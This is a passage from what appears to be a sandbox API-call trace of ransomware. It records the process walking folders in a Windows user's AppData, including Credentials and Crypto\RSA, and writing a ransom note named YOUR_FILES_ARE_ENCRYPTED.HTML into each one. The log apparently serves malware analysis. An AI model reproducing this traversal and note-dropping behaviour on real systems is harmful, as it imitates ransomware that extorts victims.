cAlternateFileName="MLASEV~1.XSL")) returned 1 [0165.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 102 [0165.073] lstrcmpW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.073] PathFindExtensionW (pszPath="MLASeventhEditionOfficeOnline.xsl") returned=".xsl" [0165.073] lstrlenW (lpString=".xsl") returned 4 [0165.073] PathFindExtensionW (pszPath="MLASeventhEditionOfficeOnline.xsl") returned=".xsl" [0165.073] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e1bd830, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0165.074] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 79 [0165.074] lstrcmpW (lpString1="SIST02.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.074] PathFindExtensionW (pszPath="SIST02.XSL") returned=".XSL" [0165.074] lstrlenW (lpString=".XSL") returned 4 [0165.074] PathFindExtensionW (pszPath="SIST02.XSL") returned=".XSL" [0165.074] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e08cd30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x60, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0165.074] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 81 [0165.074] lstrcmpW (lpString1="TURABIAN.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.074] PathFindExtensionW (pszPath="TURABIAN.XSL") returned=".XSL" [0165.074] lstrlenW (lpString=".XSL") returned 4 [0165.074] PathFindExtensionW (pszPath="TURABIAN.XSL") returned=".XSL" [0165.074] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e08cd30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x60, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0165.074] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.076] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0165.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\bibliography\\style\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.079] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.081] CloseHandle (hObject=0x304) returned 1 [0165.082] GetProcessHeap () returned 0x270000 [0165.083] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.083] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1ad920, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Style", cAlternateFileName="")) returned 0 [0165.083] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.083] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0165.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\bibliography\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.084] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.087] CloseHandle (hObject=0x5e4) returned 1 [0165.087] GetProcessHeap () returned 0x270000 [0165.088] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.088] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0165.088] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials") returned 61 [0165.088] GetProcessHeap () returned 0x270000 [0165.088] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.088] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials" [0165.088] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0165.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.089] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.089] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.089] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.089] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0165.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.090] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.094] CloseHandle (hObject=0x5e4) returned 1 [0165.094] GetProcessHeap () returned 0x270000 [0165.095] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.095] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0165.095] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto") returned 56 [0165.095] GetProcessHeap () returned 0x270000 [0165.095] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.095] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto" [0165.095] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0165.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.096] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.096] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 1 [0165.096] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 60 [0165.096] GetProcessHeap () returned 0x270000 [0165.096] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.096] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0165.096] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0165.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.097] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.097] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.097] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.097] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0165.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.098] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.100] CloseHandle (hObject=0x304) returned 1 [0165.100] GetProcessHeap () returned 0x270000 [0165.101] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.101] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 0 [0165.101] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.101] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0165.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.102] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.104] CloseHandle (hObject=0x5e4) returned 1 [0165.105] GetProcessHeap () returned 0x270000 [0165.106] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.106] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0165.106] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 74 [0165.106] GetProcessHeap () returned 0x270000 [0165.106] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.106] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0165.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0165.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.109] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.109] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1033", cAlternateFileName="")) returned 1 [0165.109] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 79 [0165.109] GetProcessHeap () returned 0x270000 [0165.109] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.109] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0165.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0165.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.110] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.110] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4cd600, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 